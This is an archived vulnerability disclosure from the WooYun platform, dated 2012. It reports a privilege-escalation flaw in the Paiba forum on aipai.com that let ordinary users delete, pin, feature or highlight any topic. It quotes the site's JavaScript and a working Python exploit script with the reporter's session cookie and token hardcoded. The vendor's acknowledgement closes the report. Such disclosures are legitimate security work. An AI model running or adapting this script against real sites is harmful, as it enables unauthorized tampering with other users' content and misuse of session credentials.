乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2012-10-14: 细节已通知厂商并且等待厂商处理中 2012-10-15: 厂商已经确认,细节仅向厂商公开 2012-10-25: 细节向核心白帽子及相关领域专家公开 2012-11-04: 细节向普通白帽子公开 2012-11-14: 细节向实习白帽子公开 2012-11-28: 细节向公众公开
爱拍拍吧主题可越权操作,可置顶、删除、加精等任何主题
自己发了一个帖子,然后看到可以自己删自己的帖子,就试了试改了一改帖子的ID,发现也能正常运行,于是就出了下面的东西。在http://www.aipai.com/app/www/templates/paiba/js/topic.js中,暴露了加精置顶之类的具体操作。
pb.topic.remove = function(tid, gid){ var idString = tid+','+gid; $(this).pop_confirm({ title :'删除话题', msg : '你确定要删除此话题吗?', confirm : function(opt){ var getUrl = 'http://www.aipai.com/apps/paibaInfo.php'; var metadata ='tidAndGid='+idString+'&action=delTopic&callback=pb.topic.removeCb&atoken='+getActionToken(); $.ajax({ type: "GET", url: getUrl, dataType: 'jsonp', data: metadata }); $(this).pop_close(opt.id); } }); return false; };
pb.topic.modify = function(tid,gid,action,value){ var idString = tid+','+gid+','+action+','+value; var title = '拍吧话题'; var tips = ''; if (action === 'up') { if (value === 0) { tips = '将该话题置顶吗?'; }else { tips = '取消置顶吗?'; } }else if (action === 'class') { if (value === 0) { tips = '将该话题设为精华吗?'; }else { tips = '取消精华吗?'; } }else if (action === 'style') { if (value === 0) { tips = '将该话题的标题套红显示吗?'; }else { tips = '取消标题套红吗?'; } }else { $(this).pop_alert({ title : title, msg : '参数出错,请刷新后重试。' }); return false; } $(this).pop_confirm({ title :title, msg : tips, confirm : function(opt){ var getUrl = 'http://www.aipai.com/apps/paibaInfo.php'; var metadata = 'actStr='+idString+'&action=topicModify&back=pb.topic.modifyCb&atoken='+getActionToken(); $.ajax({ type: "POST", url: getUrl, dataType: 'jsonp', data: metadata }); $(this).pop_close(opt.id); } }); return false; };
其中,下面那个是可以用GET模式的,不一定要用POST。开发的是好人,他写的代码我基本能看懂说的是什么。。。-,-使用一个普通帐号的就可以进行管理类操作,要用自己的TOKEN和COOKIES
于是,经过一轮折腾,写出了PY的利用工具COOKIES和TOKEN都是有效的,你们可以直接用下面的来测试,保存为1.py之类的就OK
# -*- coding: gbk -*- import httplib head = {'Cookie':'CNZZDATA1935056=cnzz_eid=91731278-1341997550-http%253A%252F%252Fgame.aipai.com%252Fpay.php&ntime=1341997550&cnzz_a=5&retime=1341998034546&sin=http%253A%252F%252Fgame.aipai.com%252Fpay.php<ime=1341998034546&rtime=0; AIPAI_cookietime=2592000; smile=1D1; vd=0-0-1-0-0-0-0-0; vd_sc=1; playNum=1; a_pro=%7B%220%22%3A%221106%22%7D; parent_url=http%3A//ba.aipai.com/104203; s=1; n=imlonghao; up=http%3A%2F%2Ffu1.aipai.com%2Faccount%2F754%2F11709754%2Faccount%2F11709754_big.jpg; b=11709754; p=38845827ee; t=1350107606; at=2ac1216efacb6dfad39b6cda5dc5270d; ul=6; lg=0; lt=1344948471; f=8; a_index_c=%7B%2211709754%22%3A%7B%22p%22%3A%5B%5D%2C%22g%22%3A3%7D%7D; gvisited=%7B%22104203%22%3A2%7D; loginLog=11709754; notifyNum=0; notifyNumOld=0'} def delTopic(tid,bid):#删除 conn = httplib.HTTPConnection('www.aipai.com') conn.request('GET','/apps/paibaInfo.php?tidAndGid='+tid+','+bid+'&action=delTopic&callback=pb.topic.removeCb&atoken=c59b2ccad12051fa0ead6767282cd63e',headers=head) result1=conn.getresponse() result2=result1.read() if 'true' in result2: print '操作成功' else: print '操作失败' conn.close() def gm(tid,bid,a,b):#管理操作 conn = httplib.HTTPConnection('www.aipai.com') conn.request('GET','/apps/paibaInfo.php?actStr='+tid+','+bid+','+a+','+b+'&action=topicModify&back=pb.topic.modifyCb&atoken=c59b2ccad12051fa0ead6767282cd63e',headers=head) result1=conn.getresponse() result2=result1.read() if 'true' in result2: print '操作成功' else: print '操作失败' conn.close() while True: tid=raw_input('请输入帖子ID:') bid=raw_input('请输入板块ID:') i=raw_input('请选择你要进行的操作\n(1为删除,2为管理类操作):') if i=='1': delTopic(tid,bid) if i=='2': c=raw_input('请选择你要进行的操作\n(1为置顶,2为取消置顶,3为加精,4为取消加精,5为加亮,6为取消加亮):') if c=='1': gm(tid,bid,'up','0') if c=='2': gm(tid,bid,'up','1') if c=='3': gm(tid,bid,'class','0') if c=='4': gm(tid,bid,'class','1') if c=='5': gm(tid,bid,'style','0') if c=='6': gm(tid,bid,'style','1')
记得帮我刷新一下COOKIES和TOKEN.......
权限权限权限权限权限权限权限权限....
危害等级:高
漏洞Rank:12
确认时间:2012-10-15 12:56
感谢反馈。 :-) 正在处理。
暂无